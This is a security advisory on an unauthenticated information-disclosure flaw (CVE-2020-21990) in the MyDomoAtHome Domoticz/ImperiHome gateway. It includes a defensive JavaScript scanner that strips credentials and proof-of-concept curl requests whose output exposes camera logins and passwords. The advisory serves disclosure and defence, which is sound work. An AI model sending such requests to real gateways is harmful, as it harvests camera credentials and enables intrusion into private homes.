Title: MyDomoAtHome (MDAH) REST API Domoticz ISS Gateway 0.2.40 Information Disclosure
Advisory ID: [ZSL-2019-5555](<ZSL-2019-5555.php>)
Type: Local/Remote
Impact: Exposure of System Information, Exposure of Sensitive Information, Security Bypass
Risk: (4/5)
Release Date: 29.12.2019
##### Summary
MyDomoAtHome (MDAH) is a REST gateway between Domoticz and ImperiHome ISS. Domoticz is a home automation system with a wide library of supported devices, ranging from weather stations to smoke detectors to remote controls, and a large number of additional third-party integrations are documented on the project's website. It is designed with an HTML5 frontend, making it accessible from desktop browsers and most modern smartphones, and is lightweight, running on many low-power devices such as the Raspberry Pi.
##### Description
The MyDomoAtHome REST API is affected by an information disclosure vulnerability due to improper access control enforcement: the gateway's `/devices` endpoint answers any client without authentication and returns the complete ISS device list, including the `localjpegurl` and `remotejpegurl` parameters of `DevCamera` devices. The ISS device documentation allows the camera login and password to be embedded in those URLs (`http://login:pass@url`), and in practice they also appear as `usr=`/`pwd=` query parameters, so an unauthenticated remote attacker can enumerate every device and harvest the camera credentials with a single plain HTTP GET, then use them against the cameras themselves.
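The following is an added example written for this page in JavaScript (MDAH is a Node.js/Express application); it is not code from the advisory or from the MyDomoAtHome project. It takes a `/devices` payload of the shape shown in the PoC, flags every parameter value that embeds camera credentials (URL userinfo or `usr=`/`pwd=` style query keys), and builds a copy with those credentials removed, which is the most a gateway should hand to a caller it has not authenticated. The function names, the sample payload (values taken from the PoC output, with two control entries added) and the list of secret-bearing query keys are assumptions made for the demo; the `devices` wrapper key follows the ISS response format.

```javascript
// Added example, not code from the ZSL advisory or the MyDomoAtHome project.
// Scans an ISS /devices payload for camera URLs that embed credentials and
// produces a credential-free copy. Names and sample data are assumptions.

// Query-string keys that carry a login or password in the camera URLs shown
// in the advisory PoC (usr=, pwd=) plus common variants (assumed list).
const SECRET_QUERY_KEYS = new Set(['usr', 'user', 'username', 'pwd', 'pass', 'password']);

// Constructed sample payload modelled on the PoC output. ISS wraps the list in
// an object; the key name "devices" is assumed. The last two entries are
// controls: a camera without credentials and a non-camera device.
const SAMPLE_PAYLOAD = { devices: [
  { id: '2_cam', name: 'Extérieur', type: 'DevCamera', room: 'Switches', params: [
    { key: 'localjpegurl', value: 'http://admin:s3cr3t0P4ssw0rduz@192.168.0.50:8083/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin&pwd=s3cr3t0P4ssw0rduz' },
    { key: 'remotejpegurl', value: 'http://192.168.0.50:8083/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin&pwd=s3cr3t0P4ssw0rduz' } ] },
  // Malformed exactly like PoC #2: userinfo followed by a second "http://".
  { id: 'C0', name: 'Portail', type: 'DevCamera', room: 'Switches', params: [
    { key: 'localjpegurl', value: 'http://admin:y3T4n0ther1&&@http://192.168.1.210/doc/page/preview.asp' } ] },
  { id: '4_cam', name: 'uvccam', type: 'DevCamera', room: 'Switches', params: [
    { key: 'localjpegurl', value: 'http://127.0.0.1:8080/uvccapture.cgi' } ] },
  { id: '1', name: 'Lamp', type: 'DevSwitch', room: 'Switches', params: [
    { key: 'Status', value: '0' } ] },
] };

// scheme://login:pass@ prefix, used only for values the URL parser rejects.
const USERINFO_RE = /^([a-z][a-z0-9+.-]*:\/\/)[^/?#@]*@/i;

// Fallback for values the WHATWG URL parser rejects: split the query by hand.
function rawQueryPairs(value) {
  const q = value.indexOf('?');
  if (q < 0) return [];
  return value.slice(q + 1).split('#')[0].split('&').filter(Boolean);
}

// Where does this value carry a credential? Returns [] when it does not,
// otherwise entries such as 'userinfo' (http://login:pass@host) and
// 'query:pwd'. A malformed URL must not hide a secret, hence the fallback.
function findEmbeddedCredentials(value) {
  const hits = [];
  let url = null;
  try { url = new URL(value); } catch (_) { url = null; }
  if (url) {
    if (url.username !== '' || url.password !== '') hits.push('userinfo');
    for (const k of url.searchParams.keys()) {
      if (SECRET_QUERY_KEYS.has(k.toLowerCase())) hits.push('query:' + k);
    }
  } else {
    if (USERINFO_RE.test(value)) hits.push('userinfo');
    for (const pair of rawQueryPairs(value)) {
      const k = pair.split('=')[0];
      if (SECRET_QUERY_KEYS.has(k.toLowerCase())) hits.push('query:' + k);
    }
  }
  return hits;
}

// Remove the credentials but keep the locator: clear the userinfo and drop the
// secret-bearing query pairs entirely (a placeholder such as pwd=REDACTED would
// still tell an attacker which parameter to brute force). The fallback branch
// drops any URL fragment, which camera snapshot URLs do not use.
function stripCredentials(value) {
  try {
    const url = new URL(value);
    url.username = '';
    url.password = '';
    for (const k of Array.from(url.searchParams.keys())) {
      if (SECRET_QUERY_KEYS.has(k.toLowerCase())) url.searchParams.delete(k);
    }
    return url.toString();
  } catch (_) {
    const q = value.indexOf('?');
    const base = (q < 0 ? value : value.slice(0, q)).replace(USERINFO_RE, '$1');
    const kept = rawQueryPairs(value)
      .filter((pair) => !SECRET_QUERY_KEYS.has(pair.split('=')[0].toLowerCase()));
    return base + (kept.length ? '?' + kept.join('&') : '');
  }
}

function deviceList(payload) {
  return Array.isArray(payload) ? payload : (payload.devices || []);
}

// One finding per parameter that leaks a credential (what a scanner reports).
function scanDevices(payload) {
  const findings = [];
  for (const d of deviceList(payload)) {
    for (const p of d.params || []) {
      if (typeof p.value !== 'string') continue;
      const hits = findEmbeddedCredentials(p.value);
      if (hits.length) findings.push({ id: d.id, name: d.name, type: d.type, key: p.key, hits });
    }
  }
  return findings;
}

// Deep-copied device list with every flagged value stripped (what an
// unauthenticated caller may receive, if it should receive anything at all).
function sanitizeDevices(payload) {
  return deviceList(payload).map((d) => ({
    ...d,
    params: (d.params || []).map((p) =>
      typeof p.value === 'string' && findEmbeddedCredentials(p.value).length
        ? { ...p, value: stripCredentials(p.value) }
        : { ...p }),
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of scanDevices(SAMPLE_PAYLOAD)) console.log(`${f.id} (${f.name}) ${f.key}: ${f.hits.join(', ')}`);
  console.log(JSON.stringify({ devices: sanitizeDevices(SAMPLE_PAYLOAD) }));
}

module.exports = { SAMPLE_PAYLOAD, findEmbeddedCredentials, stripCredentials, scanDevices, sanitizeDevices };
```

Run with `node` against a saved `/devices` response to inventory which cameras leak credentials before the gateway is fixed. Note that stripping is a stop-gap for the response body only: the real fix is to refuse unauthenticated requests to the gateway (or bind it to a trusted interface), since the stripped URLs still disclose the camera hosts and ports.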
##### Vendor
Emmanuel - <https://github.com/empierre/MyDomoAtHome>
##### Affected Version
0.2.40
##### Tested On
NodeJS: 10.15.0, 8.15.1, 8.15.0, 8.11.1, 8.9.4, 4.8.7, 4.2.2
Webmanager/Engine: EJS
Renderer: Express
##### Vendor Status
N/A
##### PoC
[domoticz_info.txt](<../../codes/domoticz_info.txt>)

The PoC file is reproduced here. It is dated 07.11.2019, credits Gjoko 'LiquidWorm' Krstic (@zeroscience), lists the product pages <https://github.com/empierre/MyDomoAtHome>, <https://www.domoticz.com/wiki/ImperiHome> and <https://docs.imperihome.com/app/iss>, and quotes the ImperiHome ISS documentation for the `DevCamera` device type, which shows why the device list is sensitive:

Device Type string: DevCamera

| Param Key | Description |
| --- | --- |
| localjpegurl | Local URL to the JPEG snapshot of the camera (Note: login/pass can be passed like this http://login:pass@url) |
| localmjpegurl | Local URL to the camera's MJPEG stream |
| remotejpegurl | Remote URL to the JPEG snapshot of the camera |
| remotemjpegurl | Remote URL to the camera's MJPEG stream |

PoC #1: an unauthenticated GET to the gateway's `/devices` endpoint on port 3001. The last 950 bytes of the response hold three `DevCamera` entries, each with at least one `localjpegurl`/`remotejpegurl` value that carries the camera login and password both as URL userinfo and as `usr`/`pwd` query parameters:

```
root@kali:~/domoticz# curl -s http://192.168.0.100:3001/devices |tail -c $((100+850))
[{"value":"http://admin:s3cr3t0P4ssw0rduz@192.168.0.50:8083/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin&pwd=s3cr3t0P4ssw0rduz","key":"localjpegurl"},{"value":"http://192.168.0.50:8083/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin&pwd=s3cr3t0P4ssw0rduz","key":"remotejpegurl"}],"name":"Extérieur","type":"DevCamera","id":"2_cam","room":"Switches"},{"params":[{"value":"http://admin2:An0th3rs3cr3tp4ss@192.168.0.15:8084/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin2&pwd=An0th3rs3cr3tp4ss","key":"localjpegurl"},{"value":"http://192.168.0.50:8083/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin&pwd=s3cr3t0P4ssw0rduz","key":"remotejpegurl"}],"name":"cuisine","type":"DevCamera","id":"3_cam","room":"Switches"},{"params":[{"value":"http://127.0.0.1:8080/uvccapture.cgi","key":"localjpegurl"},{"value":"http://192.168.0.50:8083/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin&pwd=s3cr3t0P4ssw0rduz","key":"remotejpegurl"}],"name":"uvccam","type":"DevCamera","id":"4_cam","room":"Switches"}]}
```

PoC #2: the same request against a second installation. The last 178 bytes expose the credentials of a camera named "Portail" (note the malformed URL, with a second `http://` after the userinfo, which a naive URL parser may reject but which still leaks the password):

```
root@kali:~/domoticz# curl -s http://192.168.1.100:3001/devices |tail -c $((200-22))
{"id":"C0","name":"Portail","type":"DevCamera","room":"Switches","params":[{"key":"localjpegurl","value":"http://admin:y3T4n0ther1&&@http://192.168.1.210/doc/page/preview.asp"}]}]}
```

##### Credits
Vulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>
##### References
[1] <https://www.exploit-db.com/exploits/47824>
[2] <https://packetstormsecurity.com/files/155787>
[3] <https://cxsecurity.com/issue/WLB-2020010007>
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/173700>
[5] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21990>
[6] <https://nvd.nist.gov/vuln/detail/CVE-2020-21990>
[7] <https://www.tenable.com/cve/CVE-2020-21990>

NVD scores CVE-2020-21990 at CVSS v3.1 7.5 (High), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N, and CVSS v2 5.0 (Medium), vector AV:N/AC:L/Au:N/C:P/I:N/A:N, classified as CWE-863 (Incorrect Authorization).
##### Changelog
[29.12.2019] - Initial release
[24.01.2020] - Added reference [1], [2], [3] and [4]
[19.06.2021] - Added reference [5], [6] and [7]
##### Contact
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)